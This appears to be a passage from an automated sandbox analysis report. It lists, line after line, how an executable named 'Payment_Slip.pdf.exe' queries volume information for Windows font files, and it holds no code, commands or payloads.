Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
